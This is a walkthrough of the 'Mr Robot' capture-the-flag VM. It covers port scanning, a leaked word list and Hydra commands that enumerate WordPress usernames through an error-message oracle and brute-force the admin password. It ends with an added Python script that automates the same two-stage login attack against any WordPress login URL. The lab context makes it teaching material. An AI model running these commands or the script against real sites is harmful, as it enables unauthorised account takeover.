Mr. Robot Writeup (Walkthrough Step by Step)

Mr. Robot Walkthrough

The VM is called Mr Robot and is themed after the TV show of the same name. It contains 3 flags to find, each of increasing difficulty.

____________________________________

Let’s start with a quick port scan.

$ nmap -sS -T4 target

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-04-03 12:25 EDT
Nmap scan report for vm (target)
Host is up (0.00025s latency).
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https


Nothing fancy, just a web server running.

The website basically tells you a few things, and lets you input some commands. After a quick test, those don’t seem very useful.

As always, I then start by taking a look at the robots.txt file.



/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

Alright, key-1-of-3.txt is the first flag, found already! The second file, fsocity.dic, looks promising.

$ file fsocity.dic
fsocity.dic: ASCII text, with very long lines

$ wc -l fsocity.dic
858160 fsocity.dic

$ head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window

That looks like a custom word list with 800k+ entries. However, most of them are repeated:

$ sort fsocity.dic | uniq | wc -l
11451

To store the unique entries in a file (the redirect itself prints nothing, so we count the result afterwards):

$ sort fsocity.dic | uniq > fsocitysorted.dic
$ wc -l fsocitysorted.dic
11451 fsocitysorted.dic

Next we need to find hidden directories and files. There are various tools for this (in our lab we used nmap’s http-enum.nse script); here I used nikto:

nikto -h target
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: target
+ Target Hostname: target
+ Target Port: 80
+ Start Time: 2017-04-03 18:32:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
(...)
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-admin/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
---------------------------------------------------------------------------
+ 1 host(s) tested


We clearly have a WordPress install here. If we browse to /readme.html, we can see that the WordPress version used is 4.3.9.

The next thing I did was to run WPScan against the machine. It revealed several outdated components, but nothing I managed to exploit.

Therefore, I decided to focus on the administration panel and to try to brute force the administrator credentials. The first step is to find a valid username. Unfortunately the website doesn’t contain any posts, so no author name is exposed anywhere, and WPScan’s user enumeration also comes back empty.

Fortunately there is a very handy tool called Hydra that can brute force almost anything, including usernames in an HTTP form. Submitting the form on /wp-login.php sends a POST request with three fields: log (the username), pwd (the password) and wp-submit=Log In.

When we tried to log in with made-up credentials, the login page answered with the error “Invalid username”. That message is only returned for a username that does not exist, so it works as a username oracle: we can feed the whole word list as usernames, use any fixed password, and treat every response that does not contain “Invalid username” as a hit.

hydra -t 64 -L fsocitysorted.dic -p wedontcare target_ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Let’s break it down:

  • -t 64 : Run 64 parallel login attempts (fine against a lab VM; far too noisy for a real target)
  • -L fsocitysorted.dic : Try every entry of the de-duplicated word list as the username
  • -p wedontcare : Use a single fixed password; its value doesn’t matter (we’re only interested in the username for now)
  • target_ip : The IP of the machine we’re attacking
  • http-post-form : What we’re brute forcing, here an HTTP POST form
  • ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
    • /wp-login.php : The path where the form is submitted
    • log=^USER^&pwd=^PASS^&wp-submit=Log+In : The POST parameters to send. ^USER^ and ^PASS^ are placeholders that will be replaced with the actual values.
    • F=Invalid username : Consider an attempt a failure (F) if the response contains the text “Invalid username”; anything else is reported as a valid login, which here means a valid username

After a few minutes, we get:

[80][http-post-form] host: 192.168.2.4 login: elliot password: wedontcare

Now we know there is a WordPress user named elliot. Hydra reports the pair as a “valid” login only because the failure string was absent; the password wedontcare is of course wrong.

With the right username the error changes: WordPress now tells us that the password entered for the username elliot is incorrect. The end of that message, “is incorrect”, is the failure string for the password run.



Let’s try to brute force his password using the same technique and word list, shall we? This time -l (lowercase) fixes the single username and -P iterates the list as passwords. WordPress 4.x core applies no login lockout, which is why this works; a site protected by a login-limiting plugin or a WAF would block the source or lock the account after a few attempts.

$ hydra -t 64 -l elliot -P fsocitysorted.dic target_ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

[80][http-post-form] host: 192.168.2.4 login: elliot password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
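As an added example (not part of the original walkthrough), the following Python script performs the same two stages the Hydra runs above performed: username enumeration on the “Invalid username” oracle, then password guessing against a confirmed user on the “is incorrect” oracle, with the word list de-duplicated the way the sort | uniq step did. It uses only the standard library. The login URL, file names, the probe_fn hook (there so the logic can be exercised without a live target) and the sample response fragments are this example’s own assumptions, not taken from the post.

```python
"""Two-stage WordPress login attack mirroring the two hydra runs above.

Stage 1 enumerates usernames with the "Invalid username" oracle; stage 2
brute-forces the password of a confirmed account with the "is incorrect"
oracle. Standard library only. The URL, file names and the probe_fn hook
are this example's own choices (assumptions), not taken from the post.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Error fragments wp-login.php embeds in its response body; these are the
# same strings the hydra runs above pass as their F= failure conditions.
BAD_USER = "Invalid username"
BAD_PASS = "is incorrect"


def dedupe(words):
    """Drop duplicate entries but keep first-seen order (sort | uniq would reorder)."""
    seen = set()
    out = []
    for w in words:
        w = w.rstrip("\r\n")
        if w and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def load_wordlist(path):
    """Read a file such as fsocity.dic and return its unique entries."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return dedupe(fh)


def classify(status, location, set_cookie, body):
    """Map one wp-login.php response to bad_user / bad_pass / success / unknown."""
    if BAD_USER in body:
        return "bad_user"      # account does not exist
    if BAD_PASS in body:
        return "bad_pass"      # account exists, password wrong
    # A real login answers 302 to /wp-admin/ and sets wordpress_logged_in_* cookies.
    if status == 302 and "wordpress_logged_in_" in set_cookie:
        return "success"
    return "unknown"           # e.g. lockout page, WAF block, or changed error text


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the 302 of a successful login stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def probe(url, user, password, timeout=10):
    """POST one credential pair (the same fields hydra sends) and classify the reply."""
    data = urllib.parse.urlencode(
        {"log": user, "pwd": password, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        resp = _OPENER.open(req, timeout=timeout)
    except urllib.error.HTTPError as err:   # the unfollowed 302 arrives here
        resp = err
    body = resp.read().decode("utf-8", "replace")
    cookies = " ".join(resp.headers.get_all("Set-Cookie") or [])
    return classify(resp.getcode(), resp.headers.get("Location", ""), cookies, body)


def enumerate_users(url, candidates, dummy_password="wedontcare", probe_fn=probe):
    """Stage 1: any name that is not rejected with 'Invalid username' is a real account."""
    return [u for u in candidates if probe_fn(url, u, dummy_password) != "bad_user"]


def crack_password(url, user, candidates, probe_fn=probe):
    """Stage 2: sequential guesses for one user; returns the password or None."""
    for pw in candidates:
        if probe_fn(url, user, pw) == "success":
            return pw
    return None


if __name__ == "__main__":
    # usage: python wp_login_brute.py http://target/wp-login.php fsocitysorted.dic
    login_url, wordlist = sys.argv[1], sys.argv[2]
    words = load_wordlist(wordlist)
    users = enumerate_users(login_url, words)
    print("users:", users)
    for u in users:
        print(u, "->", crack_password(login_url, u, words))
```

The script is sequential, so it is slower than hydra -t 64 but far easier to reason about; the “unknown” class is what you will see first when a lockout plugin or WAF starts answering instead of WordPress, and it is worth stopping rather than ploughing on when that happens.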

We now have valid credentials (elliot / ER28-0652) and can log in to the WordPress administration panel.



Enjoy! 